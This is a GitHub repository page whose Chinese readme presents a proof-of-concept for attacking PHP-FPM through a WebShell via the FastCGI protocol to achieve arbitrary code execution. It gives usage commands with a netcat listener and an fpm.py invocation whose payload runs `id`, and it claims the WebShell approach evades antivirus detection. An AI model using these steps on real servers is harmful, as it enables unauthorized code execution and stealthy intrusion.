Skip to content
用WebShell攻击PHP-FPM Attacking PHP-FPM with WebShell
Python PHP
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore
fpm.py
poc.php
poc.png
readme.md

readme.md

用WebShell攻击PHP-FPM

来自@Medicean 大佬的文末一个想法 https://mp.weixin.qq.com/s/T_k_TVv6h7W8paZyHym-sw

快速实现了一个poc,可以实现任意代码执行

后续用单文件PHP实现一个Fastcgi Client,然后已知PHP文件就用WebShell自身,没有什么骚操作的话WebShell应该就是免杀的

使用

测试 php7.3-fpm,在TCP模式和本地socket都可以运行

echo "<?php echo 1; ?>" > /tmp/poc.php

nc -lvp 6666 > payload.txt

python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php

运行poc.php

php poc.php

参考

fpm.py 来自 https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写

You can’t perform that action at this time.